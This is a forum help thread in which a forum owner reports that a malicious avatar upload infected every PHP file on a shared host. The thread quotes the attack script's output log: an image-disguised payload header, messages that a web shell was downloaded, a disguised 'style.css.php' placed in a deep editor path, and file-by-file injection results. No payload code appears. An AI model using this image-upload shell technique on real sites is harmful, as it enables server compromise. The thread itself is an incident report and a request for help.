I have the bookmark mod and the donate mod. I think that is it. I have tinymce on another path in a mambo install. That is where the 'avatar' script put the files that infected all of my PHP files on my part of the shared server. The script reported it was looking for the longest path only though not tinymce - see below.

I was trying to figure out what this new 'member' krisbarteo was up to when the forum reported he/she was trying to edit his/her theme. I had already put him/her in a limited group that can't post or pm because of the same Latvian IP address as mentioned above - lots of visitors from Europe IPs lately who have been trying to spam.

Instead of getting a list of themes with how many persons were in each when I accessed them in admin (I have everyone in one theme) I got an output web page 244 pages long in MS Word (when I copied it) of an upload to the mambo directory and a message saying 'injecting PHP files' along with a list of all the PHP files that were changed across all my folders/domains/programs.

ÿØÿá�¼Exif��II*� ��� �   � ��� ���1  � ���J���2  � ���f���   � ��� ���i‡ � ���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16� ��� ���0220' � ���515�   � ��� ���   � ��� ��������� �ÿþ 'exploit full path

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH

What a nightmare! My web host security person was able to remove the injected PHP script from the tops of all the PHP files for me thank goodness, but I did not at first know what happened other than the script output I got when I clicked on 'choose themes...' so I knew the problem had originated somehow with SMF. My confidence is battered. I did not know something this 'simple' could bypass so much of the server security, htaccess and folder permissions.

After all the work it will take the rest of the evening to put things to rights, I wonder how likely it is something similar will happen again now? I will definitely disallow uploading their own avatars. Some members won't like that, but it's better than having this happen again.

JBlaze

Can you post that code in code tags?
Jason Clemons
Former Team Member 2009 - 2012

djkimmel

#59

ÿØÿá�¼Exif��II*� ��� �   � ��� ���1  � ���J���2  � ���f���   � ��� ���i‡ � ���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16� ��� ���0220' � ���515�   � ��� ���   � ��� ��������� �ÿþ 'exploit full path [/home/username/public_html/forum/index.php]
[6910002]
1.0
http://www.greatlakesbass.com/forum/index.php?action=theme;sa=pick;u=-1;sesc=07d0####ddf20ad1792de13df1a8188e
root dir path [/home/username/public_html/]

SYSTEM: Linux servername #.#.##.# #5 SMP Mon Mar 30 04:51:09 CDT 2009 i686 i686 i386 GNU/Linux
MY USER ID: #####; MY GROUP ID: #####; CURRENT USER: username
________________________________________

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH
the longest available path: /home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/
path of main script successfully set [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/]
[5482745]
name of main script successfully set [style.css.php]
[2246876]
relative root dir successfully set [/home/username/public_html/]
[5893301]

my packed size: 0171552
main script path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/style.css.php]
[48839]
shell path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/s.php]
[58392]
INJECTING PHP FILES
GOTO: /home/username/public_html/
[uid:32148; gid:99; uname:username; gname:nobody] [0750] /home/username/public_html/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/articles/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/images/
[uid:32148; gid:32150; uname:username; gname:username] [0644] /home/username/public_html/domain/index.php [not patched] [patched]
etc, etc for 244 pages total


Sorry... a little frazzled after today.

Advertisement: